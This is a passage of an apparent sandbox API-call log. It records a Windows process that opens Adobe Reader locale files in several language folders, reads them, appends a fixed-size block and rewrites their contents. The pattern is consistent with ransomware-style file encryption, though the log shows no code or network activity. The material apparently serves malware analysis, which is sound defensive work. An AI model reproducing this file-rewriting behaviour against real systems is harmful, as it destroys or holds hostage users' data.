hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x8fab [0084.355] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.355] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.355] ReleaseMutex (hMutex=0x168) returned 1 [0084.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7358c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0084.356] ReadFile (in: hFile=0x1cc, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0084.380] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7fab [0084.381] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.391] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7fab [0084.391] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea7eb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7eb8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.392] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0084.392] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0084.392] CloseHandle (hObject=0x1cc) returned 1 [0084.393] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Annots.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\annots.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0084.393] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.393] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7ca00 [0084.411] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.412] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.412] ReleaseMutex (hMutex=0x168) returned 1 [0084.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.RUM", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0084.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.RUM", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.RUM", lpUsedDefaultChar=0x0) returned 10 [0084.412] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0084.427] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7ba00 [0084.427] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.440] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7ba00 [0084.440] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.441] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0084.441] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0084.441] CloseHandle (hObject=0x1cc) returned 1 [0084.441] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\MakeAccessible.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\makeaccessible.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0084.442] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.442] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x13a00 [0084.442] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.442] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.442] ReleaseMutex (hMutex=0x168) returned 1 [0084.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.RUM", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0084.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.RUM", cchWideChar=18, lpMultiByteStr=0x1f88a64, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MakeAccessible.RUM", lpUsedDefaultChar=0x0) returned 18 [0084.443] ReadFile (in: hFile=0x1cc, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0084.453] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x12a00 [0084.454] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.475] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x12a00 [0084.475] WriteFile (in: hFile=0x1cc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.475] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0084.476] WriteFile (in: hFile=0x1cc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0084.476] CloseHandle (hObject=0x1cc) returned 1 [0084.476] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Search.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\search.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0084.477] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.477] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6000 [0084.477] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.478] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.478] ReleaseMutex (hMutex=0x168) returned 1 [0084.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.RUM", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0084.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.RUM", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.RUM", lpUsedDefaultChar=0x0) returned 10 [0084.478] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.487] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5000 [0084.487] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.500] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5000 [0084.501] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.501] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0084.501] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0084.501] CloseHandle (hObject=0x1cc) returned 1 [0084.502] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Acroform.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\acroform.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0084.502] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0084.503] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x65e00 [0084.503] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.059] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.060] ReleaseMutex (hMutex=0x168) returned 1 [0085.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.RUS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.RUS", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.RUS", lpUsedDefaultChar=0x0) returned 12 [0085.065] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.070] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x64e00 [0085.070] ReadFile (in: hFile=0x1cc, lpBuffer=0x25ad0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.072] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x64e00 [0085.072] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a2048*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a2048*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.076] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.076] WriteFile (in: hFile=0x1cc, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.076] CloseHandle (hObject=0x1cc) returned 1 [0085.077] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\EScript.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\escript.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.077] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.077] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa000 [0085.078] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.078] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.078] ReleaseMutex (hMutex=0x168) returned 1 [0085.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.RUS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.RUS", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.RUS", lpUsedDefaultChar=0x0) returned 11 [0085.078] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.087] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9000 [0085.087] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.098] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9000 [0085.098] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.099] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.099] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.099] CloseHandle (hObject=0x1cc) returned 1 [0085.099] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Reflow.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\reflow.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.100] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.100] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1200 [0085.101] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.101] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.101] ReleaseMutex (hMutex=0x168) returned 1 [0085.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflow.RUS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflow.RUS", cchWideChar=10, lpMultiByteStr=0x1f7360c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reflow.RUS", lpUsedDefaultChar=0x0) returned 10 [0085.101] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0085.109] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0085.109] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0085.109] CloseHandle (hObject=0x1cc) returned 1 [0085.109] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Weblink.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\weblink.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.110] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.111] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6c00 [0085.111] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.111] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.111] ReleaseMutex (hMutex=0x168) returned 1 [0085.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.RUS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.RUS", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.RUS", lpUsedDefaultChar=0x0) returned 11 [0085.112] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.122] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5c00 [0085.123] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.130] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5c00 [0085.131] WriteFile (in: hFile=0x1cc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.131] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.131] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.132] CloseHandle (hObject=0x1cc) returned 1 [0085.132] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\DVA.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\dva.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.132] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.133] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4600 [0085.133] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, 